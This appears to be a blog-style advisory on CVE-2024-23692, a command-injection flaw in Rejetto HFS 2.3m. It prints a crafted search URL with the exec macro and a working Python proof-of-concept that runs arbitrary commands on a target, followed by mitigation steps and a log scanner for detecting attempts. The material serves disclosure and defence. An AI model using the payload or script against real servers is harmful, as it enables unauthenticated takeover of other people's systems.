Rejetto HTTP File Server (HFS) has been a popular choice for quickly sharing files over HTTP. However, a dangerous vulnerability exists in its final release, version 2.3m—and all earlier versions—letting attackers run system commands remotely. In this article, we’ll break down CVE-2024-23692, show how it works, walk through a proof-of-concept exploit, and recommend what you can do to protect yourself.
What is CVE-2024-23692?
This CVE refers to an unauthenticated template injection bug: attackers can place their own macro text into a template field in HFS, tricking the server into running commands they choose. This can mean total remote compromise—an attacker can take control of your server.
Status:
As of the CVE assignment, HFS v2.3m is end-of-life (no more updates are coming). The bug affects all versions up to and including 2.3m.
Original advisory and references
- NVD official entry
- Rejetto official site
Technical Breakdown
HFS uses “templates” to serve web pages. Template fields such as %user% or %folder% get replaced by real data when the page is rendered. But if a user request puts unexpected macro text into one of those fields, HFS sometimes interprets it—even when that macro runs a system command.
The default template’s search feature is especially risky: attackers can use a special URL to “inject” system commands using template syntax like {.exec|YOUR-COMMAND-HERE.}, which HFS will then execute on the server.
1. Send a Specially Crafted URL
Attackers can use the search endpoint and abuse the template parser.
For example, to launch the Windows calculator (calc.exe), they might send:
http://TARGET-IP/?search=={%{.exec|calc.exe.}%}
Or, to open a reverse shell (the most dangerous case), they can run PowerShell or cmd commands the same way.
2. Code Snippet: Python Proof-of-Concept
Below is a simple Python proof-of-concept. It sends a single search request that tells HFS to execute the supplied command.
import requests
import sys

if len(sys.argv) < 3:
    print(f"Usage: {sys.argv[0]} http://TARGET-IP COMMAND")
    sys.exit(1)

url = sys.argv[1]
cmd = sys.argv[2]

# Build the injection string: the HFS macro syntax {.exec|COMMAND.}
payload = '{.exec|' + cmd + '.}'
params = {
    'search': '==' + payload
}

try:
    # The vulnerable search endpoint feeds the parameter into the template parser
    resp = requests.get(url, params=params, timeout=10)
    print(f"Server HTTP status: {resp.status_code}")
    print("---- Response ----")
    print(resp.text)
except requests.RequestException as e:
    print(f"Error: {e}")
Usage:
python exploit_hfs_cve2024-23692.py http://192.168.1.100:808 "cmd.exe /c whoami"
This will try to run whoami on the vulnerable HFS server.
3. Viewing Output
If the command's output is written into the page (this depends on the template and the command), it will show up in the browser or terminal. Attackers can chain commands to upload web shells or create malicious users.
Mitigation
- Block public HTTP access: Only share files internally.
- Remove (or edit) templates: You could, in theory, remove or lock down template fields, but it is best to move off HFS 2.x altogether.
- Upgrade: Consider switching to HFS v3 BETA (from their GitHub page) or another file sharing solution.
Impact
A single GET request can let a stranger launch malware, install ransomware, steal files, or use your server in larger attacks (such as botnets). This bug is “wormable”—malware could automatically spread from server to server.
Real-world scenario:
If your HFS is exposed to the internet, even for a short time, bots can quickly find and abuse this flaw.
Final Thoughts
- CVE-2024-23692 is simple for attackers to exploit, and it gives them full control over the server.
- If you use HFS 2.3m or older, disconnect it and upgrade or replace it now.
- Check your logs for suspicious requests to /search!
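Here is an added example (not from the original post) of what that log check can look like: a small Python scanner that pulls the request target out of combined-format access log lines, URL-decodes each query parameter (repeatedly, so double-encoded variants are not missed), and flags any value that carries the {.exec|...} macro syntax described above. The log lines are constructed samples, and the combined log format is an assumption about how the proxy or server in front of HFS writes them.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The HFS macro that CVE-2024-23692 abuses: "{.exec|COMMAND.}"
MACRO_RE = re.compile(r"\{\.\s*exec\s*\|", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2024:10:15:09 +0000] "GET /?search=holiday+photos HTTP/1.1" 200 512
203.0.113.9 - - [01/Jun/2024:10:16:22 +0000] "GET /?search==%7B.exec%7Ccalc.exe.%7D HTTP/1.1" 200 742
198.51.100.7 - - [01/Jun/2024:10:17:01 +0000] "GET /docs/report.pdf HTTP/1.1" 200 10231
198.51.100.8 - - [01/Jun/2024:10:18:45 +0000] "GET /?search=%3D%3D%257B.exec%257Ccmd.exe.%257D HTTP/1.1" 200 742
"""

def fully_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode until stable so %257B (double-encoded '{') is still caught."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def is_template_injection(request_target: str) -> bool:
    """True if any query parameter of the request target contains the exec macro."""
    query = urlsplit(request_target).query
    # parse_qs already decodes one layer; fully_decode handles nested encoding
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(MACRO_RE.search(fully_decode(v)) for v in values):
            return True
    return False

def find_suspicious(log_text: str) -> list:
    """Return (client_ip, decoded_target) for every log line carrying the macro."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_template_injection(m.group(1)):
            hits.append((line.split()[0], fully_decode(m.group(1))))
    return hits

if __name__ == "__main__":
    for ip, target in find_suspicious(SAMPLE_LOG):
        print(f"possible CVE-2024-23692 attempt from {ip}: {target}")
```

Point it at your real access log instead of SAMPLE_LOG; a hit means the request should be treated as an exploitation attempt regardless of the HTTP status code, since HFS returns 200 either way.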
Further reading:
- CVE-2024-23692 on Mitre
- Proof-of-concept exploits on GitHub (search for CVE-2024-23692)
Timeline
Published on: 05/31/2024 10:15:09 UTC
Last modified on: 08/01/2024 23:15:46 UTC